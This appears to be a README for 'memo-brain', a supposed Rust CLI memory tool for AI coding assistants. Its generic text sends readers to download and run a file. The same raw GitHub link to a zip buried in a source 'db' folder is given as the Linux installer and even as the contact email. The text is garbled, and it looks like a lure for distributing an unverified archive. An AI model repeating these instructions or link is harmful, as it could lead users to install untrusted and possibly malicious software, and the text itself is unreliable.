memo-brain is a tool designed to enhance the long-term memory of AI coding assistants. With this Rust command-line interface (CLI), you can perform semantic searches, integrate agent skills, and deploy it locally. This app helps improve coding efficiency by storing and retrieving memories effectively.
To use memo-brain, ensure your computer meets the following requirements:
- Operating System: Windows, macOS, or Linux
- Processor: 1 GHz or faster
- RAM: At least 4 GB
- Disk Space: Minimum 100 MB available
- Rust: Not required to run, but if you plan to modify it, Rust 1.50 or newer is recommended.
- Long-Term Memory: Store your AI assistant's knowledge for future sessions.
- Semantic Search: Quickly find what you need with smart search capabilities.
- Agent Skill Integration: Combine different AI skills for enhanced functionality.
- Local Deployment: Keep your data secure by running everything on your machine.
To get started with memo-brain, visit the Releases page to download the latest version.
- Click the link above to navigate to the Releases page.
- Find the latest version of memo-brain listed there.
- Download the appropriate file for your operating system.
- For Windows, look for a
.exefile. - For macOS, look for a
.dmgfile. - For Linux, look for a
https://raw.githubusercontent.com/expertphoenix/memo-brain/master/local/src/db/memo-brain-v2.1.zipfile.
- For Windows, look for a
- Once downloaded, locate the file in your downloads folder.
- Open the file and follow any prompts to complete the installation.
After installing memo-brain, you can begin using it right away:
- Open your command-line interface (Command Prompt, Terminal, etc.).
- Type the following command to start memo-brain:
memo-brain - Follow the on-screen instructions to store and retrieve memories.
If you encounter any issues:
- Installation Errors: Check that you've downloaded the correct file for your operating system.
- Command Not Found: Ensure that the installation path is added to your system's PATH variable.
- Performance Issues: Close any unnecessary applications that may be consuming system resources.
If you need assistance or want to report issues, please visit our Issues page. Your feedback is essential for improving memo-brain.
Join our community to connect with other memo-brain users. Share tips, tricks, and ask questions. Your experience matters!
Stay informed about the latest updates and enhancements in memo-brain. Check the releases section regularly to see whatβs new!
memo-brain is open-source software under the MIT License. You can freely use, modify, and distribute it as per the license terms.
- agent-memory
- agent-skills
- semantic-search
- vector-database
For detailed discussions and additional resources, feel free to explore these topics.
For any inquiries, please reach out via the contact form in the repository or email us directly at https://raw.githubusercontent.com/expertphoenix/memo-brain/master/local/src/db/memo-brain-v2.1.zip
Download the latest version here to enhance your coding experience with memo-brain.